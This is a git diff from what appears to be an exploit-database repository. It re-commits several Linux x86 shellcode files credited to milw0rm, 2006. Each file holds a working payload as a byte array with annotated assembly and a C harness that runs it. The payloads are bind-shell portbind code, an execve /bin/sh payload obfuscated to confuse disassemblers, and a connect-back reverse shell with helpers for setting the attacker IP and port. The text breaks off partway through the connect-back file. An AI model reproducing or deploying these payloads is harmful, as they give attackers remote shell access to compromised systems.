+ */ + +/* + * setuid(0) + * + * 8049380: 31 c0 xor %eax,%eax + * 8049382: 31 db xor %ebx,%ebx + * 8049384: b0 17 mov $0x17,%al + * 8049386: cd 80 int $0x80 + * + * socket(AF_INET, SOCK_STREAM, 0) + * + * 8049388: 31 db xor %ebx,%ebx + * 804938a: f7 e3 mul %ebx + * 804938c: b0 66 mov $0x66,%al + * 804938e: 53 push %ebx + * 804938f: 43 inc %ebx + * 8049390: 53 push %ebx + * 8049391: 43 inc %ebx + * 8049392: 53 push %ebx + * 8049393: 89 e1 mov %esp,%ecx + * 8049395: 4b dec %ebx + * 8049396: cd 80 int $0x80 + * + * bind(s, server, sizeof(server)) + * + * 8049398: 89 c7 mov %eax,%edi + * 804939a: 52 push %edx + * 804939b: 66 68 7a 69 pushw $0x697a + * 804939f: 43 inc %ebx + * 80493a0: 66 53 push %bx + * 80493a2: 89 e1 mov %esp,%ecx + * 80493a4: b0 10 mov $0x10,%al + * 80493a6: 50 push %eax + * 80493a7: 51 push %ecx + * 80493a8: 57 push %edi + * 80493a9: 89 e1 mov %esp,%ecx + * 80493ab: b0 66 mov $0x66,%al + * 80493ad: cd 80 int $0x80 + * + * listen(s, 1) + * + * 80493af: b0 66 mov $0x66,%al + * 80493b1: b3 04 mov $0x4,%bl + * 80493b3: cd 80 int $0x80 + * + * accept(s, 0, 0) + * + * 80493b5: 50 push %eax + * 80493b6: 50 push %eax + * 80493b7: 57 push %edi + * 80493b8: 89 e1 mov %esp,%ecx + * 80493ba: 43 inc %ebx + * 80493bb: b0 66 mov $0x66,%al + * 80493bd: cd 80 int $0x80 + * + * dup2(c, 2) + * dup2(c, 1) + * dup2(c, 0) + * + * 80493bf: 89 d9 mov %ebx,%ecx + * 80493c1: 89 c3 mov %eax,%ebx + * 80493c3: b0 3f mov $0x3f,%al + * 80493c5: 49 dec %ecx + * 80493c6: cd 80 int $0x80 + * 80493c8: 41 inc %ecx + * 80493c9: e2 f8 loop 80493c3 + * + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 80493cb: 51 push %ecx + * 80493cc: 68 6e 2f 73 68 push $0x68732f6e + * 80493d1: 68 2f 2f 62 69 push $0x69622f2f + * 80493d6: 89 e3 mov %esp,%ebx + * 80493d8: 51 push %ecx + * 80493d9: 53 push %ebx + * 80493da: 89 e1 mov %esp,%ecx + * 80493dc: b0 0b mov $0xb,%al + * 80493de: cd 80 int $0x80 + * 80493e0: 00 00 add %al,(%eax) + */ + +char sc[] = /* 8 + 88 = 96 bytes */ 
+"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" +"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" +"\x89\xc7\x52\x66\x68" +"\x7a\x69" // port 31337/tcp, change if needed +"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" +"\xb0\x66\xb3\x04\xcd\x80" +"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" +"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" +"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13361.c b/platforms/lin_x86/shellcode/13361.c index 5429e0804..e9deb2bfa 100755 --- a/platforms/lin_x86/shellcode/13361.c +++ b/platforms/lin_x86/shellcode/13361.c 
@@ -1,99 +1,99 @@ -/* - * Shellcode - portbind (84 bytes) - * - * Copyright (c) 2002 Giuseppe Gottardi 'oveRet' - * - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * 1. Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * 2. Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND - * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS - * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT - * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY - * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF - * SUCH DAMAGE. 
- * - * - * 8048304: 6a 66 push $0x66 - * 8048306: 58 pop %eax - * 8048307: 6a 01 push $0x1 - * 8048309: 5b pop %ebx - * 804830a: 99 cltd - * 804830b: 52 push %edx - * 804830c: 53 push %ebx - * 804830d: 6a 02 push $0x2 - * 804830f: 89 e1 mov %esp,%ecx - * 8048311: cd 80 int $0x80 - * 8048313: 52 push %edx - * 8048314: 43 inc %ebx - * 8048315: 68 ff 02 0a 93 push $0x930a02ff - * 804831a: 89 e1 mov %esp,%ecx - * 804831c: 6a 10 push $0x10 - * 804831e: 51 push %ecx - * 804831f: 50 push %eax - * 8048320: 89 e1 mov %esp,%ecx - * 8048322: 89 c6 mov %eax,%esi - * 8048324: b0 66 mov $0x66,%al - * 8048326: cd 80 int $0x80 - * 8048328: 43 inc %ebx - * 8048329: 43 inc %ebx - * 804832a: b0 66 mov $0x66,%al - * 804832c: cd 80 int $0x80 - * 804832e: 52 push %edx - * 804832f: 56 push %esi - * 8048330: 89 e1 mov %esp,%ecx - * 8048332: 43 inc %ebx - * 8048333: b0 66 mov $0x66,%al - * 8048335: cd 80 int $0x80 - * 8048337 89 d9 mov %ebx,%ecx - * 8048339: 89 c3 mov %eax,%ebx - * 804833b: b0 3f mov $0x3f,%al - * 804833d: 49 dec %ecx - * 804833e: cd 80 int $0x80 - * 8048340: 41 inc %ecx - * 8048341: e2 f8 loop 804833b - * 8048343: 52 push %edx - * 8048344: 68 6e 2f 73 68 push $0x68732f6e - * 8048349: 68 2f 2f 62 69 push $0x69622f2f - * 804834e: 89 e3 mov %esp,%ebx - * 8048350: 52 push %edx - * 8048351: 53 push %ebx - * 8048352: 89 e1 mov %esp,%ecx - * 8048354: b0 0b mov $0xb,%al - * 8048356: cd 80 int $0x80 - * -*/ - -#include -#define L_PORT "\x0a\x93" /* Port 2707 */ - -char shellcode[] = "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89" - "\xe1\xcd\x80\x52\x43\x68\xff\x02"L_PORT"\x89\xe1" - "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80" - "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0" - "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" - "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f" - "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; - -main() -{ - void (*f)(); - (long) f = &shellcode; - fprintf(stdout, "lenght: %d bytes\n", sizeof(shellcode) - 1); - f(); -} - +/* + * 
Shellcode - portbind (84 bytes) + * + * Copyright (c) 2002 Giuseppe Gottardi 'oveRet' + * + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. 
+ * + * + * 8048304: 6a 66 push $0x66 + * 8048306: 58 pop %eax + * 8048307: 6a 01 push $0x1 + * 8048309: 5b pop %ebx + * 804830a: 99 cltd + * 804830b: 52 push %edx + * 804830c: 53 push %ebx + * 804830d: 6a 02 push $0x2 + * 804830f: 89 e1 mov %esp,%ecx + * 8048311: cd 80 int $0x80 + * 8048313: 52 push %edx + * 8048314: 43 inc %ebx + * 8048315: 68 ff 02 0a 93 push $0x930a02ff + * 804831a: 89 e1 mov %esp,%ecx + * 804831c: 6a 10 push $0x10 + * 804831e: 51 push %ecx + * 804831f: 50 push %eax + * 8048320: 89 e1 mov %esp,%ecx + * 8048322: 89 c6 mov %eax,%esi + * 8048324: b0 66 mov $0x66,%al + * 8048326: cd 80 int $0x80 + * 8048328: 43 inc %ebx + * 8048329: 43 inc %ebx + * 804832a: b0 66 mov $0x66,%al + * 804832c: cd 80 int $0x80 + * 804832e: 52 push %edx + * 804832f: 56 push %esi + * 8048330: 89 e1 mov %esp,%ecx + * 8048332: 43 inc %ebx + * 8048333: b0 66 mov $0x66,%al + * 8048335: cd 80 int $0x80 + * 8048337 89 d9 mov %ebx,%ecx + * 8048339: 89 c3 mov %eax,%ebx + * 804833b: b0 3f mov $0x3f,%al + * 804833d: 49 dec %ecx + * 804833e: cd 80 int $0x80 + * 8048340: 41 inc %ecx + * 8048341: e2 f8 loop 804833b + * 8048343: 52 push %edx + * 8048344: 68 6e 2f 73 68 push $0x68732f6e + * 8048349: 68 2f 2f 62 69 push $0x69622f2f + * 804834e: 89 e3 mov %esp,%ebx + * 8048350: 52 push %edx + * 8048351: 53 push %ebx + * 8048352: 89 e1 mov %esp,%ecx + * 8048354: b0 0b mov $0xb,%al + * 8048356: cd 80 int $0x80 + * +*/ + +#include +#define L_PORT "\x0a\x93" /* Port 2707 */ + +char shellcode[] = "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89" + "\xe1\xcd\x80\x52\x43\x68\xff\x02"L_PORT"\x89\xe1" + "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80" + "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0" + "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" + "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f" + "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; + +main() +{ + void (*f)(); + (long) f = &shellcode; + fprintf(stdout, "lenght: %d bytes\n", sizeof(shellcode) - 1); + f(); +} + // 
milw0rm.com [2006-07-04] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13362.c b/platforms/lin_x86/shellcode/13362.c index df8ced55f..1a903e61e 100755 --- a/platforms/lin_x86/shellcode/13362.c +++ b/platforms/lin_x86/shellcode/13362.c 
@@ -1,66 +1,66 @@ -/* execve() shellcode with 'fuck up disasm' ability, 32 bytes long - by BaCkSpAcE [sinisa86(at)gmail(dot)com] - BitByterz Labs 2006 - http://www.bitbyterz.org - -; -; shellcode.asm -; - fupdisasm: - db 0x68 ; opcode for PUSH DW instruction - db 0xcd ; crypt+1, opcode for INT instruction - db 0x80 ; interrupt number (80 in this case) - db 0x68 ; crypt+3 - db 0x68 - jmp fupdisasm+3 - db 0x68 ; MAGIC_BYTE: this byte makes disasm go crazy - -; our shellcode which we want to hide - push byte 11 - pop eax - xor edx, edx - push edx - push 0x68732f2f - push 0x6e69622f - mov ebx, esp - push edx - push ebx - mov ecx, esp - jmp fupdisasm+1 ; jumps on address where is hidden int 0x80 - - - backspace@bitbyterz# nasm shellcode.asm - backspace@bitbyterz# ndisasm -u shellcode - 00000000 68CD806868 push dword 0x686880cd - 00000005 EBFC jmp short 0x3 - 00000007 686A0B5831 push dword 0x31580b6a - 0000000C D25268 rcl byte [edx+0x68],cl - 0000000F 2F das - 00000010 2F das - 00000011 7368 jnc 0x7b - 00000013 682F62696E push dword 0x6e69622f - 00000018 89E3 mov ebx,esp - 0000001A 52 push edx - 0000001B 53 push ebx - 0000001C 89E1 mov ecx,esp - 0000001E EBE1 jmp short 0x1 - - Find difference between original and dissasembled shellcode ;) -*/ - -#include -#include - -char shellcode[] = "\x68\xcd\x80\x68\x68\xeb\xfc\x68" - "\x6a\x0b\x58\x31\xd2\x52\x68\x2f" - "\x2f\x73\x68\x68\x2f\x62\x69\x6e" - "\x89\xe3\x52\x53\x89\xe1\xeb\xe1"; - -main() { - void (*fp) (void); - fp = (void *) shellcode; - printf ("%d bytes\n", strlen(shellcode)); - fp(); -} - +/* execve() shellcode with 'fuck up disasm' ability, 32 bytes long + by BaCkSpAcE [sinisa86(at)gmail(dot)com] + BitByterz Labs 2006 + http://www.bitbyterz.org + +; +; shellcode.asm +; + fupdisasm: + db 0x68 ; opcode for PUSH DW instruction + db 0xcd ; crypt+1, opcode for INT instruction + db 0x80 ; interrupt number (80 in this case) + db 0x68 ; crypt+3 + db 0x68 + jmp fupdisasm+3 + db 0x68 ; MAGIC_BYTE: this byte makes disasm go 
crazy + +; our shellcode which we want to hide + push byte 11 + pop eax + xor edx, edx + push edx + push 0x68732f2f + push 0x6e69622f + mov ebx, esp + push edx + push ebx + mov ecx, esp + jmp fupdisasm+1 ; jumps on address where is hidden int 0x80 + + + backspace@bitbyterz# nasm shellcode.asm + backspace@bitbyterz# ndisasm -u shellcode + 00000000 68CD806868 push dword 0x686880cd + 00000005 EBFC jmp short 0x3 + 00000007 686A0B5831 push dword 0x31580b6a + 0000000C D25268 rcl byte [edx+0x68],cl + 0000000F 2F das + 00000010 2F das + 00000011 7368 jnc 0x7b + 00000013 682F62696E push dword 0x6e69622f + 00000018 89E3 mov ebx,esp + 0000001A 52 push edx + 0000001B 53 push ebx + 0000001C 89E1 mov ecx,esp + 0000001E EBE1 jmp short 0x1 + + Find difference between original and dissasembled shellcode ;) +*/ + +#include +#include + +char shellcode[] = "\x68\xcd\x80\x68\x68\xeb\xfc\x68" + "\x6a\x0b\x58\x31\xd2\x52\x68\x2f" + "\x2f\x73\x68\x68\x2f\x62\x69\x6e" + "\x89\xe3\x52\x53\x89\xe1\xeb\xe1"; + +main() { + void (*fp) (void); + fp = (void *) shellcode; + printf ("%d bytes\n", strlen(shellcode)); + fp(); +} + // milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13363.c b/platforms/lin_x86/shellcode/13363.c index b4de012e6..42124ffb7 100755 --- a/platforms/lin_x86/shellcode/13363.c +++ b/platforms/lin_x86/shellcode/13363.c 
@@ -1,162 +1,162 @@ -/*---------------------------------------------------------------------------* - * 100 byte Portbind shellcode * - * by Benjamin Orozco - benoror@gmail.com * - *---------------------------------------------------------------------------* - * filename: x86-linux-portbind.c * - * discription: x86-linux portbind shellcode. * - * Pretty big but excellent for educational purposes. * - * Use SET_PORT() before using the shellcode. Example: * - * * - * SET_PORT(sc, 31337); * - * * - *___________________________________________________________________________* - *---------------------------------------------------------------------------*/ - -/*---------------------------------------------------------------------------* - * ASM Code * - *---------------------------------------------------------------------------* - -# s = socket(2, 1, 0) -push $0x66 # -pop %eax # 0x66 = socketcall -push $0x1 # -pop %ebx # socket() = 1 -xor %ecx,%ecx # -push %ecx # 0 -push $0x1 # SOCK_STREAM = 1 -push $0x2 # AF_INET = 2 -mov %esp,%ecx # Arguments -int $0x80 # EXECUTE - Now %eax have the s fileDescriptor - -# bind(s [2, 64713, 0], 0x10) -xor %edx,%edx -push %edx # INADDR_ANY = 0 -pushw $0xc9fc # PORT = 64713 -pushw $0x2 # AF_INET = 2 -mov %esp,%ecx # %ecx holds server struct -push $0x10 # sizeof(server) = 10 -push %ecx # server struct -push %eax # s fileDescriptor -mov %esp,%ecx -mov %eax,%esi # now %esi holds s fileDescriptor -push $0x2 # -pop %ebx # bind() = 2 -push $0x66 # -pop %eax # 0x66 = socketcall -int $0x80 # On success: %eax = 0 - -# listen(s, 0) -push $0x66 # -pop %eax # 0x66 = socketcall -push $0x4 # -pop %ebx # listen() = 4 -int $0x80 # On success: %eax = 0 - -# c = accept(s, 0, 0) -xor %ecx,%ecx -push %ecx -push %ecx -push %esi # %esi = s -mov %esp,%ecx # Arguments -push $0x5 # -pop %ebx # accept() = 5 -push $0x66 # -pop %eax # 0x66 = socketcall -int $0x80 # EXECUTE - Now %eax have c fileDescriptor - -# dup2(c, 2) , dup2(c, 1) , dup2(c, 0) -xchg %eax,%ebx # 
Put c fileDescriptor on %ebx [for dup2()] -push $0x2 -pop %ecx -dup_loop: -mov $0x3f,%al # dup2() = 0x3f -int $0x80 -dec %ecx -jns dup_loop - -# execve("/bin//sh", ["/bin//sh",NULL]) -mov $0xb,%al # execve = 11d -push %edx -push $0x68732f2f -push $0x6e69622f -mov %esp,%ebx -push %edx -push %ebx -mov %esp, %ecx -int $0x80 - -*----------------------------------------------------------------------------*/ - -char sc[] = -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\x6a\x01" //push $0x1 -"\x5b" //pop %ebx -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x6a\x01" //push $0x1 -"\x6a\x02" //push $0x2 -"\x89\xe1" //mov %esp,%ecx -"\xcd\x80" //int $0x80 -"\x31\xd2" //xor %edx,%edx -"\x52" //push %edx -"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT -"\x66\x6a\x02" //pushw $0x2 -"\x89\xe1" //mov %esp,%ecx -"\x6a\x10" //push $0x10 -"\x51" //push %ecx -"\x50" //push %eax -"\x89\xe1" //mov %esp,%ecx -"\x89\xc6" //mov %eax,%esi -"\x6a\x02" //push $0x2 -"\x5b" //pop %ebx -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\xcd\x80" //int $0x80 -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\x6a\x04" //push $0x4 -"\x5b" //pop %ebx -"\xcd\x80" //int $0x80 -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x51" //push %ecx -"\x56" //push %esi -"\x89\xe1" //mov %esp,%ecx -"\x6a\x05" //push $0x5 -"\x5b" //pop %ebx -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\xcd\x80" //int $0x80 -"\x93" //xchg %eax,%ebx -"\x6a\x02" //push $0x2 -"\x59" //pop %ecx -"\xb0\x3f" //mov $0x3f,%al -"\xcd\x80" //int $0x80 -"\x49" //dec %ecx -"\x79\xf9" //jns 48 -"\xb0\x0b" //mov $0xb,%al -"\x52" //push %edx -"\x68\x2f\x2f\x73\x68" //push $0x68732f2f -"\x68\x2f\x62\x69\x6e" //push $0x6e69622f -"\x89\xe3" //mov %esp,%ebx -"\x52" //push %edx -"\x53" //push %ebx -"\x89\xe1" //mov %esp,%ecx -"\xcd\x80"; //int $0x80 - -void SET_PORT(char *buf, int port) { - *(unsigned short *)(((buf)+22)) = (port); - char tmp = buf[22]; - buf[22] = buf[23]; - buf[23] = tmp; -} - -main(){ - printf("size: %d bytes\n", strlen(sc)); - - 
SET_PORT(sc, 33333); - __asm__("call sc"); -} - +/*---------------------------------------------------------------------------* + * 100 byte Portbind shellcode * + * by Benjamin Orozco - benoror@gmail.com * + *---------------------------------------------------------------------------* + * filename: x86-linux-portbind.c * + * discription: x86-linux portbind shellcode. * + * Pretty big but excellent for educational purposes. * + * Use SET_PORT() before using the shellcode. Example: * + * * + * SET_PORT(sc, 31337); * + * * + *___________________________________________________________________________* + *---------------------------------------------------------------------------*/ + +/*---------------------------------------------------------------------------* + * ASM Code * + *---------------------------------------------------------------------------* + +# s = socket(2, 1, 0) +push $0x66 # +pop %eax # 0x66 = socketcall +push $0x1 # +pop %ebx # socket() = 1 +xor %ecx,%ecx # +push %ecx # 0 +push $0x1 # SOCK_STREAM = 1 +push $0x2 # AF_INET = 2 +mov %esp,%ecx # Arguments +int $0x80 # EXECUTE - Now %eax have the s fileDescriptor + +# bind(s [2, 64713, 0], 0x10) +xor %edx,%edx +push %edx # INADDR_ANY = 0 +pushw $0xc9fc # PORT = 64713 +pushw $0x2 # AF_INET = 2 +mov %esp,%ecx # %ecx holds server struct +push $0x10 # sizeof(server) = 10 +push %ecx # server struct +push %eax # s fileDescriptor +mov %esp,%ecx +mov %eax,%esi # now %esi holds s fileDescriptor +push $0x2 # +pop %ebx # bind() = 2 +push $0x66 # +pop %eax # 0x66 = socketcall +int $0x80 # On success: %eax = 0 + +# listen(s, 0) +push $0x66 # +pop %eax # 0x66 = socketcall +push $0x4 # +pop %ebx # listen() = 4 +int $0x80 # On success: %eax = 0 + +# c = accept(s, 0, 0) +xor %ecx,%ecx +push %ecx +push %ecx +push %esi # %esi = s +mov %esp,%ecx # Arguments +push $0x5 # +pop %ebx # accept() = 5 +push $0x66 # +pop %eax # 0x66 = socketcall +int $0x80 # EXECUTE - Now %eax have c fileDescriptor + +# dup2(c, 2) , dup2(c, 1) , 
dup2(c, 0) +xchg %eax,%ebx # Put c fileDescriptor on %ebx [for dup2()] +push $0x2 +pop %ecx +dup_loop: +mov $0x3f,%al # dup2() = 0x3f +int $0x80 +dec %ecx +jns dup_loop + +# execve("/bin//sh", ["/bin//sh",NULL]) +mov $0xb,%al # execve = 11d +push %edx +push $0x68732f2f +push $0x6e69622f +mov %esp,%ebx +push %edx +push %ebx +mov %esp, %ecx +int $0x80 + +*----------------------------------------------------------------------------*/ + +char sc[] = +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\x6a\x01" //push $0x1 +"\x5b" //pop %ebx +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x6a\x01" //push $0x1 +"\x6a\x02" //push $0x2 +"\x89\xe1" //mov %esp,%ecx +"\xcd\x80" //int $0x80 +"\x31\xd2" //xor %edx,%edx +"\x52" //push %edx +"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT +"\x66\x6a\x02" //pushw $0x2 +"\x89\xe1" //mov %esp,%ecx +"\x6a\x10" //push $0x10 +"\x51" //push %ecx +"\x50" //push %eax +"\x89\xe1" //mov %esp,%ecx +"\x89\xc6" //mov %eax,%esi +"\x6a\x02" //push $0x2 +"\x5b" //pop %ebx +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\xcd\x80" //int $0x80 +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\x6a\x04" //push $0x4 +"\x5b" //pop %ebx +"\xcd\x80" //int $0x80 +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x51" //push %ecx +"\x56" //push %esi +"\x89\xe1" //mov %esp,%ecx +"\x6a\x05" //push $0x5 +"\x5b" //pop %ebx +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\xcd\x80" //int $0x80 +"\x93" //xchg %eax,%ebx +"\x6a\x02" //push $0x2 +"\x59" //pop %ecx +"\xb0\x3f" //mov $0x3f,%al +"\xcd\x80" //int $0x80 +"\x49" //dec %ecx +"\x79\xf9" //jns 48 +"\xb0\x0b" //mov $0xb,%al +"\x52" //push %edx +"\x68\x2f\x2f\x73\x68" //push $0x68732f2f +"\x68\x2f\x62\x69\x6e" //push $0x6e69622f +"\x89\xe3" //mov %esp,%ebx +"\x52" //push %edx +"\x53" //push %ebx +"\x89\xe1" //mov %esp,%ecx +"\xcd\x80"; //int $0x80 + +void SET_PORT(char *buf, int port) { + *(unsigned short *)(((buf)+22)) = (port); + char tmp = buf[22]; + buf[22] = buf[23]; + buf[23] = tmp; +} + +main(){ + printf("size: %d 
bytes\n", strlen(sc)); + + SET_PORT(sc, 33333); + __asm__("call sc"); +} + // milw0rm.com [2006-05-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13364.c b/platforms/lin_x86/shellcode/13364.c index c9c032c6c..9f6d5d871 100755 --- a/platforms/lin_x86/shellcode/13364.c +++ b/platforms/lin_x86/shellcode/13364.c 
@@ -1,134 +1,134 @@
-/*---------------------------------------------------------------------------*
- * 82 byte Connectback shellcode *
- * by Benjamin Orozco - benoror@gmail.com *
-*---------------------------------------------------------------------------*
- * filename: x86-linux-connectback.c *
- * discription: x86-linux connect back shellcode. Use SET_PORT() and *
- * SET_IP() before using the shellcode. Example: *
- * *
- * SET_IP(sc, "192.168.13.22"); *
- * SET_PORT(sc, 31337); *
- * *
- *___________________________________________________________________________*
- *---------------------------------------------------------------------------*/
-
-/*---------------------------------------------------------------------------*
- * ASM Code *
- *---------------------------------------------------------------------------*
-
-# s = socket(2, 1, 0)
-push $0x66 #
-pop %eax # 0x66 = socketcall
-push $0x1 #
-pop %ebx # socket() = 1
-xor %ecx,%ecx #
-push %ecx # 0
-push $0x1 # SOCK_STREAM = 1
-push $0x2 # AF_INET = 2
-mov %esp,%ecx # Arguments
-int $0x80 # EXECUTE - Now %eax have the s fileDescriptor
-
-# connect(s, [2, 64713, 127.127.127], 0x10)
-push $0x7f7f7f7f # 127.127.127 = 0x7f7f7f7f
-pushw $0xc9fc # PORT = 64713
-pushw $0x2 # AF_INET = 2
-mov %esp,%ecx # %ecx holds server struct
-push $0x10 # sizeof(server) = 10
-push %ecx # server struct
-push %eax # s fileDescriptor
-mov %esp,%ecx
-mov %eax,%esi # now %esi holds s fileDescriptor [for connect()]
-push $0x3 #
-pop %ebx # connect() = 3
-push $0x66 #
-pop %eax # 0x66 = socketcall
-int $0x80 # On success %eax = 0
-
-# dup2(s, 2) , dup2(s, 1) , dup2(s, 0)
-xchg %esi,%ebx # Put s fileDescriptor on %ebx [for dup2()]
-push $0x2
-pop %ecx
-dup_loop:
-mov $0x3f,%al # dup2() = 0x3f
-int $0x80
-dec %ecx
-jns dup_loop
-
-# execve("/bin//sh", ["/bin//sh",NULL])
-mov $0xb,%al # execve = 11d
-xor %edx,%edx
-push %edx
-push $0x68732f2f
-push $0x6e69622f
-mov %esp,%ebx
-push %edx
-push %ebx
-mov %esp, %ecx
-int $0x80
-
-*----------------------------------------------------------------------------*/
-
-char sc[] =
-"\x6a\x66" //push $0x66
-"\x58" //pop %eax
-"\x6a\x01" //push $0x1
-"\x5b" //pop %ebx
-"\x31\xc9" //xor %ecx,%ecx
-"\x51" //push %ecx
-"\x6a\x01" //push $0x1
-"\x6a\x02" //push $0x2
-"\x89\xe1" //mov %esp,%ecx
-"\xcd\x80" //int $0x80
-"\x68\x7f\x7f\x7f\x7f" //push $0x7f7f7f7f //IP
-"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT
-"\x66\x6a\x02" //pushw $0x2
-"\x89\xe1" //mov %esp,%ecx
-"\x6a\x10" //push $0x10
-"\x51" //push %ecx
-"\x50" //push %eax
-"\x89\xe1" //mov %esp,%ecx
-"\x89\xc6" //mov %eax,%esi
-"\x6a\x03" //push $0x3
-"\x5b" //pop %ebx
-"\x6a\x66" //push $0x66
-"\x58" //pop %eax
-"\xcd\x80" //int $0x80
-"\x87\xf3" //xchg %esi,%ebx
-"\x6a\x02" //push $0x2
-"\x59" //pop %ecx
-"\xb0\x3f" //mov $0x3f,%al
-"\xcd\x80" //int $0x80
-"\x49" //dec %ecx
-"\x79\xf9" //jns 34
-"\xb0\x0b" //mov $0xb,%al
-"\x31\xd2" //xor %edx,%edx
-"\x52" //push %edx
-"\x68\x2f\x2f\x73\x68" //push $0x68732f2f
-"\x68\x2f\x62\x69\x6e" //push $0x6e69622f
-"\x89\xe3" //mov %esp,%ebx
-"\x52" //push %edx
-"\x53" //push %ebx
-"\x89\xe1" //mov %esp,%ecx
-"\xcd\x80"; //int $0x80
-
-void SET_PORT(char *buf, int port) {
- *(unsigned short *)(((buf)+24)) = (port);
- char tmp = buf[24];
- buf[24] = buf[25];
- buf[25] = tmp;
-}
-
-void SET_IP(char *buf, char *ip) {
- unsigned long backip = inet_addr(ip);
- *(unsigned long *)(((buf)+18)) = (backip);
-}
-
-main(){
- printf("size: %d bytes\n", strlen(sc));
-
- SET_PORT(sc, 33333);
- SET_IP(sc, "127.0.0.1");
- __asm__("call sc");
-}
-
+/*---------------------------------------------------------------------------*
+ * 82 byte Connectback shellcode *
+ * by Benjamin Orozco - benoror@gmail.com *
+ *---------------------------------------------------------------------------*
+ * filename: x86-linux-connectback.c *
+ * discription: x86-linux connect back shellcode. Use SET_PORT() and *
+ * SET_IP() before using the shellcode. Example: *
+ * *
+ * SET_IP(sc, "192.168.13.22"); *
+ * SET_PORT(sc, 31337); *
+ * *
+ *___________________________________________________________________________*
+ *---------------------------------------------------------------------------*/
+
+/*---------------------------------------------------------------------------*
+ * ASM Code *
+ *---------------------------------------------------------------------------*
+
+# s = socket(2, 1, 0)
+push $0x66 #
